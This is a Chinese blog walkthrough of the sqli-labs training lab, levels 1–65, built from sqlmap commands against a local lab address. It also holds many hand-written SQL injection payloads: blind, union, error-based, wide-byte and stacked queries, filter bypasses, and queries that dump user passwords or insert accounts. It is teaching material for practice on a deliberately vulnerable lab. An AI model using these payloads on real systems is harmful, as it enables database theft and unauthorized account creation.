提示:手工注入就不写了,发现有很多了,质量也还可以,今天就写个sqlmap通关教程吧

文章目录

  • 前言
  • 一、sqli-labs1-10(get型)
  • 二、sqli-labs 11-16(post型基础注入)
  • 三、与BP联动
    • 1.sqli-labs 17(加选项--data数据添加)
    • 2.sqli-labs 18(`--level=3 --risk=3`User-agent做为注入点)
    • 3.sqli-labs 19 (refer字段做为注入点)
    • 4.sqli-labs 20 (cookie注入)
    • 5.sqli-labs 21(进行了cookie base64编码`--tamper="base64encode.py"`)
    • 6.sqli-labs 22 (cookie双引号编码base64)
    • 7.sqli-labs 23 (过滤注释符)
    • 8.sqli-labs 24 (污染数据库)
    • 9.sqli-labs 25 (过滤OR,AND)
    • 10.sqli-labs 26 (过滤了运算符,注释,空格)
    • 11.sqli-labs 25a (数字型注入,与25没啥区别)
    • 12.sqli-labs 26a (跟26差不多,就多了括号)
    • 13.sqli-labs 27 (过滤select和union)
    • 14.sqli-labs 27a (多了双引号比27盲注)
    • 15.sqli-labs 28(过滤了union和select以及空格,注释)
    • 16.sqli-labs 28a (过滤了union+selcect 过滤规则与27有不同)
    • 17.sqli-labs29 (校验第一个参数,构造第二个绕过)
    • 18.sqli-labs 30 (同29,将单引号换成双引号)
    • 19 .sqli-labs 31 (同30,多了一个括号)
    • 20.sqli-labs 32 (使用函数转义,但数据库采用GBK可通过宽字节注入)
    • 21.sqli-labs 33 (同32 宽字节解决问题)也可用sqlmap
    • 22.sqli-labs 34 (利用addslashes()进行转义,宽字节绕过)
    • 23.sqli-labs 35 (利用addslashes,但参数没引号,联合查询直接过)
    • 24.sqli-labs 36 (mysql_real_escape_string函数对于特殊字符进行转义,id参数无单引号)同32
    • 25.sqli-labs 37 (mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行)同34
    • 26.sqli-labs 38 (存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。)
    • 27.sqli-labs 39 (id参数是整数,联合注入过。)
    • 28.sqli-labs 40 (id参数是单引号加括号闭合,使用联合注入)
    • 29.sqli-labs 41 同39
    • 30.sqli-labs 42 (堆叠注入)
    • 31.sqli-labs 43(密码参数是单引号和括号闭合的堆叠注入。)同42
    • 32.sqli-labs 44 同42
    • 33.sqli-labs 45 同43
    • 34.sqli-labs 46 (使用sort,利用updataxml报错过)
    • 35.sqli-labs 47 同46
    • 36.sqli-labs 48 (延时注入)同46
    • 37.sqli-labs 49 (延时注入)同47
    • 38.sqli-labs 50 (updatexml报错注入,多语句执行函数,延时注入)
    • 39.sqli-labs 51 (报错延时堆叠)
    • 40.sqli-labs 52 (堆叠,延时)
    • 41.sqli-labs 53 (堆叠,延时)
    • 42.sqli-labs 54(因限制次数不可使用sqlmap)
    • 43.sqli-labs 55 (因限制次数不可使用sqlmap,id为加括号整数)
    • 44.sqli-labs 56 (因限制次数不可使用sqlmap,id为单引号加括号)
    • 45.sqli-labs 57 (因限制次数不可使用sqlmap,id为双引号加括号)
    • 46.sqli-labs 58 (目标返回数据被处理,无法使用sqlmap)
    • 47.sqli-labs 59 五十九关和五十八关一样使用报错注入,id是整数型.同58
    • 48.sqli-labs 60 六十关根据报错信息可知id参数是双引号加括号。同58
    • 49.sqli-labs 61 六十一关根据报错信息可知id参数是单引号加两个括号。同58
    • 50.sqli-labs 62 六十二关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号加括号。
    • 51.sqli-labs 63 六十三关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号。
    • 55.sqli-labs 64 同62,id参数是两个括号的整数型。
    • 56.sqli-labs 65 同62,id参数是一个括号的整数型。
    • 以上除明确过滤,或次数限制,或数据处理,均可使用sqlmap进行注入,举个
  • 总结

前言


提示:我只是跑表名来表示我注入成功,具体内容选项参加sqlmap使用帮助

一、sqli-labs1-10(get型)

太简单了,给个模板,大家自己改一下关数即可,跑出表名即为成功

sqlmap -url "http://192.168.0.107/sqli-labs/Less-9/?id=1" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch -dbs


针对一些手工盲注脚本

盲注?id=1'and length((select database()))>9--+
#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4
?id=1'and ascii(substr((select database()),1,1))=115--+
#substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+
判断所有表名字符长度。
?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
逐一判断表名?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
判断所有字段名的长度
?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+
逐一判断字段名。?id=1' and length((select group_concat(username,password) from users))>109--+
判断字段内容长度
?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
逐一检测内容。时间盲注9
?id=1' and if(1=1,sleep(5),1)--+
判断参数构造。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名长度?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐一判断表名
?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐一判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
逐一检测内容。

二、sqli-labs 11-16(post型基础注入)

-r代表文档,文档内容就是你的post报文,至于报文获得,看个人习惯使用软件,我用的BP

sqlmap -r Post-sqlinjection.txt --batch -dbs


三、与BP联动

1.sqli-labs 17(加选项–data数据添加)

这个值得注意是因为后台对用户名有检验,但是对密码没过滤,密码是诸如点,用户名固定,Dhakkan
把post报文内容拿下来

很明显,用户名给了,只让改密码

sqlmap -url "http://192.168.0.107/sqli-labs/Less-17/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --data="uname=Dhakkan&passwd=1&submit=Submit" --dbs

或者

sqlmap -r Post-sqlinjection17ErrorInjection.txt --batch -dbs

你把数据放在里面是一样的

2.sqli-labs 18(--level=3 --risk=3User-agent做为注入点)

这关是把用户代理头部给加进去了,这个地方是注入点,其他做了过滤



sqlmap -url "http://192.168.0.107/sqli-labs/Less-18/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --user-agent="1" --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3


一样,使用报文,复制进1.txt里面,之后都用1.txt

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3


3.sqli-labs 19 (refer字段做为注入点)

 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-19/" --cookie="PHPSESSID=938ba4d9befdd8411a15a447" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3 --referer="1"

不放图了,基本结果都是一样的,之后就一个位置两张图

4.sqli-labs 20 (cookie注入)


 sqlmap -r 1.txt --batch -dbs --level=3 --risk=3
sqlmap -url "http://192.168.0.107/sqli-labs/Less-20/index.php" --cookie="uname=dhakkan" --batch --dbs --data="uname=Dhakkan&passwd=1&submit=Submit" --level=3 --risk=3

5.sqli-labs 21(进行了cookie base64编码--tamper="base64encode.py"

将我们的注入语句编码即可


只写一个了,-url的大家感兴趣可以自己做一做

sqlmap -r 1.txt --batch -dbs --level=3 --risk=3 --tamper="base64encode.py"

6.sqli-labs 22 (cookie双引号编码base64)

脚本没变,同21

7.sqli-labs 23 (过滤注释符)

过滤了注释符,影响手工注入,不影响sqlmap
手工注入的脚本写一下吧,便于理解,单引号进行闭合

?id=1' or '1'='1
这样sql语句就变成 id='1' or '1'='1'?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),3 or '1'='1?id=-1' union select 1,(select group_concat(password,username) from users),3 or '1'='1

sqlmap语句就是一般get型注入,楼上写的有get型

8.sqli-labs 24 (污染数据库)

第二十四关有一个登录页面和注册页面还要一个修改密码页面,该关卡使用得是二次注入,因为登录页面和注册页面对于密码和账户名都使用mysql_real_escape_string函数对于特殊字符进行转义。这里我们利用的是注册页面,因为虽然存在函数对特殊字符进行转义,但只是在调用sql语句时候进行转义,当注册成功后账户密码存在到数据库的时候是没有转义的,以原本数据存入数据库的。这一关主要是修改管理员密码。
手段为注册用户为admin’#进行。详细信息
二次注入sqli-labs24关

http://www.manongjc.com/detail/57-kvexuwhtxaxbkpj.html

9.sqli-labs 25 (过滤OR,AND)

第二十五关根据提示是将or和and这两个替换成空,但是只替换一次。大小写绕过没有用。我们可以采用双写绕过。本次关卡使用联合注入就可以了,information里面涉及or可以写成infoorrmation。但是sqlmap并没有双写绕过脚本,因为过滤规则因情况而定。太过复杂,这个过滤规则比较简单,感兴趣可以自己去做一做。
放一个手工的注入语句

?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

10.sqli-labs 26 (过滤了运算符,注释,空格)

第二十六关将逻辑运算符,注释符以及空格给过滤了,我们需要使用单引号进行闭合,双写绕过逻辑运算符或者使用&&和||替换。空格绕过网上找了些资料,对于绕过空格限制有大把的方式对于空格,有较多的方法:%09 TAB键(水平)、%0a 新建一行、%0c 新的一页、%0d return功能、%0b TAB键(垂直)、%a0 空格,我在windows和kali里面都用不了,可能是因为apache解析不了。只能使用()绕过。报错注入空格使用比较少所以我们可以使用报错注入。

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0   爆表?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'0     爆字段?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0   爆密码账户

基本上来说,这种过滤之类的大部分是没有脚本的,因为过滤的东西不一样,他可能多过滤了,他可能少过滤了,所以很多都是没脚本的只能手工注入。对于26这种等量代换就行。还有些函数也是一样的。

11.sqli-labs 25a (数字型注入,与25没啥区别)

去掉单引号

12.sqli-labs 26a (跟26差不多,就多了括号)

没有报错,只能用盲注了,盲注的一些代码,参考上面手工盲注脚本,注意替换

13.sqli-labs 27 (过滤select和union)

二十七关没有过滤and和or,过滤了select和union,我们可以大小写绕过以及重写绕过。所以sqlmap没有这种现成脚本,情况太多了。keyi自己针对性写一些。

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0  爆表?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))or'0  爆字段?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0  爆密码账户

14.sqli-labs 27a (多了双引号比27盲注)

该关是双引号且页面不显示报错信息。过滤规则和二十七关一样。所以我们需要使用盲注和联合注入。

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

%0A代表换行符,不影响语句执行
%3a是冒号":"
%5c是“/”

15.sqli-labs 28(过滤了union和select以及空格,注释)

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(password,username)from%0Ausers%0Aand%0A('1

16.sqli-labs 28a (过滤了union+selcect 过滤规则与27有不同)

?id=0')uniunion selecton select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+

17.sqli-labs29 (校验第一个参数,构造第二个绕过)

?id=1&id=-2%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表?id=1&id=-2%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段?id=1&id=-2%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
爆密码账户

18.sqli-labs 30 (同29,将单引号换成双引号)

?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

19 .sqli-labs 31 (同30,多了一个括号)

?id=1&id=-2")%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
?id=1&id=-2")%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+   爆字段?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+

20.sqli-labs 32 (使用函数转义,但数据库采用GBK可通过宽字节注入)

?id=-1%df%27%20union%20select%201,database(),3%20--+?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

21.sqli-labs 33 (同32 宽字节解决问题)也可用sqlmap

22.sqli-labs 34 (利用addslashes()进行转义,宽字节绕过)

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  爆字段名1%df%27 union select 1,group_concat(password,username) from users--+ 爆密码账户

23.sqli-labs 35 (利用addslashes,但参数没引号,联合查询直接过)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段?id=-1%20union%20select%201,group_concat(password,username),3%20from%20users--+

24.sqli-labs 36 (mysql_real_escape_string函数对于特殊字符进行转义,id参数无单引号)同32

25.sqli-labs 37 (mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行)同34

三十七关是post提交,使用mysql_real_escape_string函数对于账户和密码都进行转义,使用宽字节注入就行。和三十四关一样。

1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+  爆字段名1%df' union select 1,group_concat(password,username) from users--+ 爆密码账户

26.sqli-labs 38 (存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。)

三十八关其实就是单引号闭合,使用正常单引号闭合就可以进行注入,不过这里可以有另外一种注入就是堆叠注入,因为存在mysqli_multi_query函数,该函数支持多条sql语句同时进行。

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
#向数据表插入自己的账户密码

27.sqli-labs 39 (id参数是整数,联合注入过。)

?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()?id=-1%20union%20select%201,group_concat(username,password),3%20from%20users

28.sqli-labs 40 (id参数是单引号加括号闭合,使用联合注入)

?id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+?id=-1%27)%20union%20select%201,group_concat(username,password),3%20from%20users%20--+

29.sqli-labs 41 同39

30.sqli-labs 42 (堆叠注入)

因为账户进行了转义处理密码没有做处理,数据库没有使用gbk编码不能向上面一样使用宽字节注入,但是存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

31.sqli-labs 43(密码参数是单引号和括号闭合的堆叠注入。)同42

login_user=1&login_password=1'); insert into users(id,username,password) values ('44','less34','123456')--+&mysubmit=Login

32.sqli-labs 44 同42

33.sqli-labs 45 同43

34.sqli-labs 46 (使用sort,利用updataxml报错过)

?sort=1%20and%20(updatexml(1,concat(0x5c,(select%20group_concat(password,username)%20from%20users),0x5c),1))

35.sqli-labs 47 同46

四十七关和四十六差不多,多了一个单引号闭合,可以使用报错注入

36.sqli-labs 48 (延时注入)同46

37.sqli-labs 49 (延时注入)同47

38.sqli-labs 50 (updatexml报错注入,多语句执行函数,延时注入)

五十关和四十六关一样,可以使用updatexml进行报错注入,不过这个里面还可以使用堆叠注入,因为使用了mysqli_multi_query函数,支持多条sql语句执行。也可以延时注入。

39.sqli-labs 51 (报错延时堆叠)

该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。该参数单引号闭合,可以报错注入,可以延时注入,可以堆叠注入。

40.sqli-labs 52 (堆叠,延时)

该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。该参数是整数型,且没有报错显示,只能堆叠注入或者延时注入。

41.sqli-labs 53 (堆叠,延时)

该参数是字符型,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入。

42.sqli-labs 54(因限制次数不可使用sqlmap)

五十四关翻译页面的英文,得知只有十次输入机会,超过十次所有表名,列名,等等都会随机重置。id参数是单引号闭合就行。
表名列名每个人都不一样

 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表名?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='RND32WPI3I'--+  爆列名?id=-1%27union%20select%201,group_concat(id,sessid,secret_3QXJ,tryy),3%20from%208fof1zun81--+  获取key值


43.sqli-labs 55 (因限制次数不可使用sqlmap,id为加括号整数)

五十五关是有14次机会,id参数是加了括号的整数

?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+   报表名?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='69jwmv27j9'--+ 爆列名?id=-1) union select 1,group_concat(secret_D1DW),3 from 69jwmv27j9--+  获取key值

44.sqli-labs 56 (因限制次数不可使用sqlmap,id为单引号加括号)

五十六关和前面两关类似需要单引号和括号

?id=-1')%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+  爆表名?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='9ze4qmv307'--+ 爆列名?id=-1') union select 1,group_concat(secret_CTVR),3 from 9ze4qmv307--+  获取key值

45.sqli-labs 57 (因限制次数不可使用sqlmap,id为双引号加括号)

五十七关就是双引号闭合

46.sqli-labs 58 (目标返回数据被处理,无法使用sqlmap)

五十八关和前面几关不一样,因为该关卡的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不行得。但是有报错显示,所以可以使用报错注入。

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
爆表名?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8edjk8ipbk'),0x7e),1)--+
爆列名?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6W8M) from challenges.8edjk8ipbk),0x7e),1)--+

47.sqli-labs 59 五十九关和五十八关一样使用报错注入,id是整数型.同58

48.sqli-labs 60 六十关根据报错信息可知id参数是双引号加括号。同58

49.sqli-labs 61 六十一关根据报错信息可知id参数是单引号加两个括号。同58

50.sqli-labs 62 六十二关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号加括号。

51.sqli-labs 63 六十三关没有报错显示,可以使用布尔盲注和时间注入。id参数是单引号。

55.sqli-labs 64 同62,id参数是两个括号的整数型。

56.sqli-labs 65 同62,id参数是一个括号的整数型。


以上除明确过滤,或次数限制,或数据处理,均可使用sqlmap进行注入,举个

总结

sql注入步骤
判断字符还是整形
字符型,判断闭合shodua,针对单双引号,哪个报错是哪个
完善闭合语句,根据引号填充,不报错开始注入
审计代码编写注入语句

具体情况,具体分析。
创作不易,有帮助的点个赞,再会!

Sqli-labs全通关教程(手工注入+工具使用sqlmap)相关推荐

  1. Upload-Labs靶场 1-21全通关教程

    Upload-Labs通关 靶场介绍 安装 文件上传漏洞介绍 BurpSuite的简单使用 安装BurpSuite 配合Firefox使用 万能WebShell 正文开始 Pass-01 Pass-0 ...

  2. 全网最全的SQL手工注入总结!(收藏这篇就够了!)

    虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要.本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册 ...

  3. 【运维安全】-MySQL手工注入

    为什么要学习手工注入? 工具:sqlmap万能密码,直接登录到后台页面,不需要密码:admin' or 1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录. 当输入admin,ad ...

  4. SQLi LABS Less 17 报错注入

    第十七关单引号字符型注入 ,推荐使用报错注入. 一.功能分析 这关是一个修改密码的功能,先查询用户名是否正确. 如果用户名正确,后台就修改密码,并提示修改成功: 如果用户名错误,页面就直接返回修改失败 ...

  5. SQLi LABS Less 14 报错注入+布尔盲注

    第十四关双引号字符串型注入 , 推荐使用报错注入.布尔盲注. 目录 一.功能分析 二.思路分析 三.解题步骤 方式一:报错注入 第一步.判断注入点 第二步.判断报错条件 第三步.脱库 方式二:布尔盲注 ...

  6. sqli——labs初学者通关详

    目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

  7. SQL注入题型(手工注入+sqlmap)

    题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用'以及and或者or来进行查看 ...

  8. 手工注入,后台另类拿webshell搞定影院系统

    作者:rabbitsafe 大家好,我是rabbitsafe,这是本人开始研究asp程序发现的第一个漏洞,就是一个注入漏洞,但是只能用手工注入,工具检测不了的.我花了三天想出了从注入到后台拿websh ...

  9. WebGoat 8.1 靶场 刷题通关教程全攻略 - (A1) Injection

    WebGoat 8.1 靶场 刷题通关教程全攻略 - A1 Injection (A1) Injection SQL Injection (intro) 2. It is your turn! 3. ...

最新文章

  1. django-admin 设计User外键,设计model
  2. 微服务网关 Kong 科普
  3. 数据库中Schema(模式)概念的理解
  4. 知识图谱应用实战案例100篇(二)-以知识图谱的方式打开预训练语言模型
  5. Java虚拟机--------JVM常见参数
  6. JAVA微信扫码支付模式二功能实现完整例子
  7. 修改页面后获得flag_逆向基础题五:获取Flag
  8. 2017年国家二级c语言题库,2017年计算机二级c语言题库及答案
  9. Google Earth Engine——Landsat (数据介绍)GEE数据到底是否满足几何和辐射校正?
  10. 华为静态路由配置实例
  11. szszszszsz
  12. STM32平台下的TM1812驱动
  13. 【LeetCode】算法初涉
  14. C# 调用ffmpeg把rtsp视频流保存为MP4文件
  15. C语言结构体中的冒号用法
  16. HDOJ 2010 水仙花数
  17. torch.Tensor.requires_grad属性的使用说明
  18. day 86 Vue学习之五DIY脚手架、webpack使用、vue-cli的使用、element-ui
  19. Mysql数据库学习笔记(2020-04-18 星期六)
  20. Win7系统经常提示显示驱动程序已停止响应并且恢复的解决办法

热门文章

  1. 近红外荧光ICG-whey protein 吲哚菁绿标记乳清蛋白
  2. Kali HTTrack演示-渗透测试察打一体(1)
  3. WSockExpert[抓包工具]
  4. 论文实验图片局部放大工具(可批量操作)
  5. ST-P3:首篇基于环视相机的端到端自动驾驶框架!(ECCV2022)
  6. JAVA对文件的读操作总结
  7. 禁止VMware虚拟机与Host的时间同步
  8. 大创项目前传——存储阶段(1)
  9. 基于遗传算法的物流企业运输成本优化MATLAB仿真,考虑运输时间约束
  10. PogoPlug折腾全过程--安装迷你云1.1.9